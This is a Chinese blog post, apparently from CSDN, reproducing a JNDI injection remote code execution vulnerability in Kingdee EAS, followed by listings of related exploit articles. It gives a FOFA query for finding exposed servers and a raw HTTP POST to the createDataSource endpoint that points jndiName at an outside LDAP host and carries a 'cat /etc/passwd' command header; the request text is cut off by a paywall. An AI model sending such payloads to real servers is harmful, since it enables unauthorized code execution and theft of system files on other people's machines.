【漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞

最新推荐文章于 2024-05-10 17:52:01 发布
最新推荐文章于 2024-05-10 17:52:01 发布
阅读量710 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_67810151/article/details/137354235
本文介绍了金蝶EAS的企业应用背景,详细阐述了其存在的JNDI注入漏洞,该漏洞允许未授权攻击者执行远程代码,可能导致服务器被完全控制。文章通过测绘语句和漏洞复现过程,揭示了漏洞的影响范围,并附有免责声明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

金蝶 EAS 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

0x02 漏洞概述

金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。

0x03 测绘语句

fofa: app="Kingdee-EAS"

0x04 漏洞复现

​
POST /appmonitor//protect/datasource/createDataSource HTTP/1.1

Host:

Cmd: cat /etc/passwd

Content-Type: application/x-www-form-urlencoded

Referer: https://xxxx

name=1234&jndiName=ldap://gobygo.net/A7&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=asdasxasx&userName=asdasxasx&password=asdasxasx&repassword=asdasxasx&connectionURL=sdasd&a
了解本专栏 订阅专栏 解锁全文 超级会员免费看
金蝶 EASEAS Cloud JNDI注入漏洞复现
0xSec
12-22 1707
金蝶 EASEAS Cloudappmonitor/protect/jndi/loadTree 路径 jndiName 参数存在JNDI注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
金蝶Apusic应用服务器 createDataSource JNDI注入漏洞(QVD-2023-48476)
0xSec
04-04 1046
由于金蝶Apusic应用服务器权限验证不当,导致攻击者可以向createDataSource接口执行JNDI注入,造成远程代码执行。利用该漏洞需低版本JDK且需要服务器上有数据库驱动。
漏洞复现金蝶EASEAS Cloud远程代码执行漏洞
2301_80127209的博客
04-03 1655
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
漏洞复现金蝶EAS uploadlogo 存在任意文件上传漏洞
https://blog.echo234.cn/
03-28 1282
金蝶EAS帮助企业构筑业财资税票档一体化平台,提升企业在市场竞争中的数字战斗力,金蝶EAS uploadlogo存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
金蝶EASEAS Cloud远程代码执行漏洞
hackzkaq的博客
10-13 1040
金蝶 EASEAS Cloud 存在远程代码执行漏洞
复现金蝶EAS系统 文件读取漏洞_13
fushuang333的博客
01-09 2187
复现金蝶EAS 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感信息文件,正常读取的文件没有经过校验或者不严格,用户可以控制这个变量读取任意文件。
金蝶EAS代码执行漏洞
zkaqlaoniao的博客
10-13 491
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
金蝶-EAS easWebClient 任意文件读取漏洞复现
02-20 3630
金蝶-EAS是一款面向大中型企业的管理软件,涵盖了财务、人力资源、采购、库存等多个功能模块,支持云计算和个性化定制,适合集团企业管理使用。
金蝶 EASEAS Cloud任意文件上传漏洞复现
0xSec
11-20 1509
金蝶 EASEAS Cloud 在 uploadLogo.action 接口处存在文件上传漏洞,攻击者可以利用文件上传漏洞执行恶意代码、写入后门、从而可能导致服务器受到攻击并被控制。
java导致敏感信息泄漏的异常_金蝶AES系统Java web配置文件敏感信息泄露漏洞
weixin_42123296的博客
03-09 1028
### 0x01 漏洞框架金蝶软件始创于1993年,是一家ERP、财务等企业管理软件厂商,拥有官网(kigndee.com)、友商网(youshang.com)、快递100(kuaidi100.com)、云之家(kdweibo.com)等互联网业务应用官方主页:www.kingdee.com客户案例:![](https://images.seebug.org/contribute/f1e376de...
Goby 漏洞发布| 金蝶 EAS createDataSource 路径 jndiName 参数远程代码执行漏洞
m0_46699477的博客
12-22 643
金蝶 EAS Cloud 融合了金蝶苍穹的 gPaaS 功能,是基于云原生架构的平台产品,可以进行容器化部署,具备一切云原生的架构特性,是一款拥有最先进底层架构的平台产品。金蝶 EAS Cloud 存在 jndi 注入漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
金蝶EAS执行漏洞
2301_80115097的博客
10-13 506
金蝶 EASEAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。金蝶 EASEAS Cloud 存在远程代码执行漏洞
禅道项目管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 2083
禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)附带POC
最新发布
hream的博客
05-10 3015
漏洞QVD-2024-15263描述了禅道项目管理系统中的身份认证绕过漏洞
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
nnn2188185的博客
01-08 1045
金蝶EAS pdfviewlocal.jsp接口存在任意文件读取漏洞 附POC软件
金蝶Apusic应用服务器 未授权目录遍历漏洞复现
0xSec
04-05 1666
由于金蝶Apusic应用服务器/admin/protected/selector/server_file/files、/admin/protected/selector/server_file/folders 等接口没有进行校验和过滤,直接将参数拼接到文件操作中,导致出现目录遍历漏洞,未经身份验证的远程攻击者可通过此漏洞读取系统内部系统文件路径及信息,导致信息泄露,系统处于极不安全状态。
金蝶EAS BOS
热门推荐
语不惊人死不休
02-19 1万+
什么是金蝶EAS BOS? BOS,Business Operation System,业务操作系统,是金蝶融合多年的企业应用软件的经验以及MDA理念研发新一代技术平台,是金蝶公司全新的管理软件开发工具和管理集成平台。金蝶BOS提供了基于模型驱动架构(MDA)的开发模式和相关的工具,成功的解决了企业应用软件在开发、实施和维护过程中的质量、周期、成本、风险等方面的问题,并使企业应用软件
某蝶EAS(Enterprise Application Suite)平台myUploadFile接口任意文件上传漏洞复现 CNVD-2023-57598
afei001
10-17 776
某蝶EAS(Enterprise Application Suite)是金某集团开发的一套企业级应用软件解决方案。它是一款集成化的企业管理软件,旨在帮助企业实现业务流程的数字化、自动化和优化。金蝶EAS提供了多个功能模块,涵盖了企业的各个方面,包括财务管理、人力资源管理、供应链管理、生产制造管理、销售与客户关系管理、项目管理等。这些模块可以根据企业的需求进行灵活的配置和定制,以满足不同行业和规模企业的管理需求。 某蝶EAS平台myUploadFile接口存在任意文件上传漏洞,攻击者可利用该
金蝶EAS,后台抛出业务异常,中断程序
MZ199290的博客
04-27 654
在后台抛出业务异常时,会在前端界面弹出消息提示框,并中断程序。 在前端页面(EAS客户端,GUI)中断程序时可使用abort(),但是abort()仅用于中断程序,消息提示需在中断之前处理。 /** * 抛出业务异常 */ public void throwBizException(String msg) throws EASBizException{ throw new EAS...
金蝶EAS开发实例分享与代码解读
总结以上内容,金蝶EAS开发实例、代码共享、例子以及系统文件等方面的知识点涵盖了金蝶EAS平台在开发和应用过程中的关键实践和概念。理解和掌握这些知识点对于金蝶EAS的开发者来说是非常重要的,它们有助于提升开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值